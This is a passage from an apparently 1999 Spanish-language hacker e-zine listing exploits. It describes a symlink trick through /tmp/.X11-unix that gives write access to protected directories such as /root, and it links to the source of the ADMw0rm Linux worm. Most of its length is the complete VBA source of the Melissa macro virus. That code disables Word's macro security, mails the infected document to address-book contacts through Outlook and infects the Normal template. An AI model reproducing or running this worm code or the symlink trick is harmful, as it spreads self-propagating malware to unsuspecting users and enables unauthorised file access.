Resulta que si, por ejemplo, hacemos un enlace simbolico al directorio
/root en /tmp/.X11-unix, y lanzamos las X con startx como toda la vida,
obtendremos permisos de escritura en el directorio /root.

Y eso, con cualquier directorio al que le tengamos denegado el acceso.

Eso si, los permisos son para la creacion de nuevos ficheros, no pudiendo
modificar los existentes.

Parece que esta afectada toda la familia BSD, y algunas lenguas comentan
que tambien sucede en Linux. Solo que en este caso no nos ha funcionado.


-( 0x09 )-
Para	 : Linux, especialmente RedHat
Tema	 : Gusanito que te crio
Patch	 : ...
Creditos : ADM

Descripcion y Notas:

Si hay algo que ha causado un revuelo estos ultimos dias ha sido la aparicion
de este gusano para Linux, especialmente RedHat 5.2.

Este gusano es una maravilla, e incluye una importante base de datos de
las vulnerabilidades de un sistema Linux. De esta forma consigue infiltrarse
en el sistema, y realiza un chequeo de todos los servicios, puertos y
programas susceptibles de tener un bug aprovechable.

Lo mas curioso es el misticismo que se ha creado en torno a el, cuando
las fuentes estan disponibles publicamente en:

---[ http://adm.isp.at/ADM/ADMw0rm-v1.tar


-( 0x0A )-
Para	 : WINDOWS !!!
Tema	 : Propagacion de virus
Patch	 : Las neuronas suelen evitar estos casos
Creditos : Kwyjibo

<++> set_019/exploits/melissa
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
  If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
    DasMapiName.Logoff
  End If
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
  Set ToInfect = ADI1
  ADI1.Name = "Melissa"
  DoAD = True
End If

If NTI1.Name <> "Melissa" Then
  If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
  Set ToInfect = NTI1
  NTI1.Name = "Melissa"
  DoNT = True
End If
    
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
  Do While ADI1.CodeModule.Lines(1, 1) = ""
    ADI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
  Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If
  
If DoAD = True Then
  Do While NTI1.CodeModule.Lines(1, 1) = ""
    NTI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
  Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
  ActiveDocument.Saved = True 
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub
<-->

Descripcion y Notas:

Todo el revuelo que se ha montado en torno a este virus. Y tanto, para que
luego simplemente se dedique a propagarse en base a las direcciones de
correo del libro de direcciones de la victima.

Claro, si la gente usase menos el OutLook, o al menos desactivase la
ejecucion automatica de macros (se puede hacer facilmente?!?! JA!!)

Pero el caso es que hasta los del Gobierno de U.S.A. se han mosqueado con
su autor y le han enchironado porque ha creado algo que infecta a los
que no tienen cuidado.

El caso es que para colmo, el autor distribuia (y distribuye) el codigo
libremente, pues es un ejemplo de lo mucho que se puede hacer si las cosas
siguen por este camino.

Imaginemonos que su intencion, en vez de ser demostrar lo que se puede
hacer, hubiese sido destruir informacion... La que se hubiese podido liar.

Por cierto, antes de que se me olvide. Teneis algo mas de informacion,
y el mismo codigo que aqui arriba en http://www.root.org